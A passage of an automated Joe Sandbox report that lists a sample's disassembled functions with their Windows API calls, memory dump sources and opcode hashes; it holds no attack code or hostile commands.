                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: c8572593815b3dbc5b91917de01ad789409c5f2003d3d17c761944b03f7a17ad
                                                                                                                                                              • Instruction ID: 671c6e4167fdc2805e876bd3ae18eed707faa5585237fa3571f7017326753922
                                                                                                                                                              • Opcode Fuzzy Hash: c8572593815b3dbc5b91917de01ad789409c5f2003d3d17c761944b03f7a17ad
                                                                                                                                                              • Instruction Fuzzy Hash: A5B012AA2783017C3A4492582F53C37413CC5C0B11331461EF014E1051E8440C160533
                                                                                                                                                              Function 00A49674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: c36eb0da9d6a1556e8e8c8bd8ea47a8b5c875b4f512cddc82de05c43ebdf08fd
                                                                                                                                                              • Instruction ID: 5a5ff243be521a9beed0e0a91da8288d665c3a12689136c3fe0425af54c1b826
                                                                                                                                                              • Opcode Fuzzy Hash: c36eb0da9d6a1556e8e8c8bd8ea47a8b5c875b4f512cddc82de05c43ebdf08fd
                                                                                                                                                              • Instruction Fuzzy Hash: 30B012AA2785027C364492181D03C37413CC1C0B11331C61EF400D1051E8401C190133
                                                                                                                                                              Function 00A49653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00A4966B
                                                                                                                                                                • Part of subcall function 00A4998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A49A09
                                                                                                                                                                • Part of subcall function 00A4998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A49A1A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                              • Opcode ID: bc09f59c3f69a0425df208ba8db6cceff1f2810cc8b2fc2b879e402a43bd8f9d
                                                                                                                                                              • Instruction ID: ca895be41c0c17254ed6c8bd95f66293b42ab280464bf2485e427431a52b5f20
                                                                                                                                                              • Opcode Fuzzy Hash: bc09f59c3f69a0425df208ba8db6cceff1f2810cc8b2fc2b879e402a43bd8f9d
                                                                                                                                                              • Instruction Fuzzy Hash: 75B012AA2782017C3B0452146D82C37413CD6C0B11331861EF010F0051A8400C150233
                                                                                                                                                              Function 00A014B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00A021A8,?,00000000,?,00000000,?,00A0390C,00000000,?,00000104), ref: 00A014E8
                                                                                                                                                                • Part of subcall function 00A03BD3: GetProcessHeap.KERNEL32(00000000,?,?,00A021CC,?,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03BDB
                                                                                                                                                                • Part of subcall function 00A03BD3: HeapSize.KERNEL32(00000000,?,00A021CC,?,75C0B390,8000FFFF,?,?,00A40267,?,?,00000000,00000000,8000FFFF), ref: 00A03BE2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3492610842-0
                                                                                                                                                              • Opcode ID: 1323b6eb8a83ba8f81dd25267634d4a7a8df24f4b978aef15eadad00f49e6853
                                                                                                                                                              • Instruction ID: 60ab92cd6025a2b34d62e034b9a4a3f8c9aab5780c596ef2d49ce570d3d2c740
                                                                                                                                                              • Opcode Fuzzy Hash: 1323b6eb8a83ba8f81dd25267634d4a7a8df24f4b978aef15eadad00f49e6853
                                                                                                                                                              • Instruction Fuzzy Hash: 4F01F97724021CABCF115E55FC80FDA77A9AF85754F114219FA165F1E1D732AC1086E0

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 5BB39384 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 249memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetSaveFileNameW.COMDLG32(?), ref: 5BB39397
                                                                                                                                                              • memset.MSVCRT ref: 5BB393A9
                                                                                                                                                              • AllocConvertMultiSZNameToAEx.FONDUE(00000000,00000001), ref: 5BB3943A
                                                                                                                                                              • free.MSVCRT ref: 5BB395F4
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39607
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39617
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39627
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39637
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB39647
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3966A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeGlobal$Name$AllocConvertFileMultiSavefreememset
                                                                                                                                                              • String ID: L
                                                                                                                                                              • API String ID: 2849690568-2909332022
                                                                                                                                                              • Opcode ID: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                              • Instruction ID: 21d808c19f2bf60455c18e43e1fa0dcd5e9bd532f6718678bc66986b2e27de0b
                                                                                                                                                              • Opcode Fuzzy Hash: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                              • Instruction Fuzzy Hash: 81B1C7B5A01208EFDB04DF94C484BEDBBB2FB48311F108159E94A9B295D7B5EAC1CF94
                                                                                                                                                              Function 5BB383B2 Relevance: 15.1, APIs: 10, Instructions: 85COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • StartDocW.GDI32(?,?), ref: 5BB383C9
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB383DD
                                                                                                                                                              • memset.MSVCRT ref: 5BB383EB
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB38413
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38487
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38497
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB384A7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeGlobal$ByteCharErrorFromLastMultiStartWidememset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3584426206-0
                                                                                                                                                              • Opcode ID: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                              • Instruction ID: 9d7f381b9fc1066624e1d70141abf82ecf9c865936cfe4d8509ca253bbf3e802
                                                                                                                                                              • Opcode Fuzzy Hash: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                              • Instruction Fuzzy Hash: B53106B5D00208EFDB40DFA0D888BAEB7B5FB44301F00C659E9156B290D7B5DA84DF96
                                                                                                                                                              Function 5BB42384 Relevance: 13.6, APIs: 9, Instructions: 85registrystringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB423A7
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423B7
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423E3
                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 5BB42400
                                                                                                                                                              • RegSetValueA.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 5BB42455
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB42468
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB42478
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastValuelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2318199773-0
                                                                                                                                                              • Opcode ID: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                              • Instruction ID: 62f50d4aa6feed3817b429dc07edf9552c1dc7ce7379a4b05b1e5e0691334358
                                                                                                                                                              • Opcode Fuzzy Hash: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                              • Instruction Fuzzy Hash: E43117B1D10219EFCF00DFA4C848BAEBBB2FB08301F008959EA15A3244D3B59694FF95
                                                                                                                                                              Function 5BB31BB6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 176COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 5BB31BCB
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31C8B
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31CD6
                                                                                                                                                              • PrintDlgA.COMDLG32(00000042), ref: 5BB31D0D
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB31DA2
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB31DD5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$Printmemset
                                                                                                                                                              • String ID: B
                                                                                                                                                              • API String ID: 4070397486-1255198513
                                                                                                                                                              • Opcode ID: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                              • Instruction ID: 6afe108593f5a5b3b6ae20c4d97b56e74a9d46c06e0c05ca8afe2fec5f6e2bc5
                                                                                                                                                              • Opcode Fuzzy Hash: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
                                                                                                                                                              • Instruction Fuzzy Hash: FF81B978A01209DFDB08DF55D080AAEBBB2FF88350F248159EC499B355D775EA81CB98
                                                                                                                                                              Function 5BB38BB5 Relevance: 12.1, APIs: 8, Instructions: 79stringwindowmemoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _SendMessage@16.FONDUE(?,00000466,?,?), ref: 5BB38BD5
                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 5BB38BE9
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB38C12
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 5BB38C33
                                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 5BB38C40
                                                                                                                                                              • _SendMessage@16.FONDUE(?,00000466,?,00000000), ref: 5BB38C5A
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 5BB38C76
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38C83
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharGlobalMessage@16MultiSendWidelstrlen$AllocFree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 559837489-0
                                                                                                                                                              • Opcode ID: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                              • Instruction ID: 49e6a8a00100dc3da80ad0077e4f2cd83a2ab268223cb2c3a0b1d2a1593ad430
                                                                                                                                                              • Opcode Fuzzy Hash: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
                                                                                                                                                              • Instruction Fuzzy Hash: 1631ECB5E00209BFDB04DFD8C845FBEB7B9FB48700F108159FA14A7284D6B5AA40DBA5
                                                                                                                                                              Function 5BB3BF90 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB3BFB4
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFC4
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFE1
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFFE
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3C034
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3C044
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB3C054
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2933462567-0
                                                                                                                                                              • Opcode ID: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                              • Instruction ID: cd61925089f64557de00c77e863698e2e42172ca2950e6fbc49bd8f366a6bcce
                                                                                                                                                              • Opcode Fuzzy Hash: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
                                                                                                                                                              • Instruction Fuzzy Hash: 4D2125B5D00249EFDB01DFE0C848BAEB7B4FB04305F108569E411A7284D7FA9A84EF95
                                                                                                                                                              Function 5BB32B80 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetLastError.KERNEL32(00000008), ref: 5BB32B9D
                                                                                                                                                              • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB32BAD
                                                                                                                                                                • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                              • newMultiByteFromWideCharSize.FONDUE(00000000,?), ref: 5BB32BCC
                                                                                                                                                              • GetDateFormatA.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 5BB32BF7
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?), ref: 5BB32C1E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB32C2E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB32C3E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$From$FreeGlobal$DateErrorFormatLastSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4159601105-0
                                                                                                                                                              • Opcode ID: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
                                                                                                                                                              • Instruction ID: d56b9f61a63688724d7fd1a84db1c3163be83414f68e3df09ecfaac852bac220
                                                                                                                                                              • Opcode Fuzzy Hash: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
                                                                                                                                                              • Instruction Fuzzy Hash: 2D21F4B1900208EFDF15DF94C889BDEBBB9FB48301F108558E510A7280D7F99A84DFA5
                                                                                                                                                              Function 5BB387B8 Relevance: 9.1, APIs: 6, Instructions: 64windowmemorystringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • LoadIconW.USER32(?,?), ref: 5BB387CF
                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 5BB387F5
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3880F
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 5BB3882E
                                                                                                                                                              • LoadIconA.USER32(?,00000000), ref: 5BB38847
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 5BB38863
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: GlobalIconLoad$AllocByteCharFreeMultiWidelstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1819427946-0
                                                                                                                                                              • Opcode ID: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
                                                                                                                                                              • Instruction ID: 93b27215f3b7c86335d313cc3d84cc23f256533cc14e065162daa3ccf44e39c8
                                                                                                                                                              • Opcode Fuzzy Hash: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
                                                                                                                                                              • Instruction Fuzzy Hash: 9D21F9B5A00109BFDB04DF98C944BBEB7B6FB48710F108229F919A7284D6B1DA41DB65
                                                                                                                                                              Function 5BB44382 Relevance: 9.1, APIs: 6, Instructions: 63memorystringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 5BB44392
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB443BB
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB443DA
                                                                                                                                                              • CreateWindowStationA.USER32(?,?,?,?), ref: 5BB443F3
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB4440E
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 5BB4441B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1685088439.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1685076008.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685107441.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685121840.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685137554.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1685153027.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharGlobalMultiWide$AllocCreateFreeStationWindowlstrlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 61863157-0
                                                                                                                                                              • Opcode ID: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
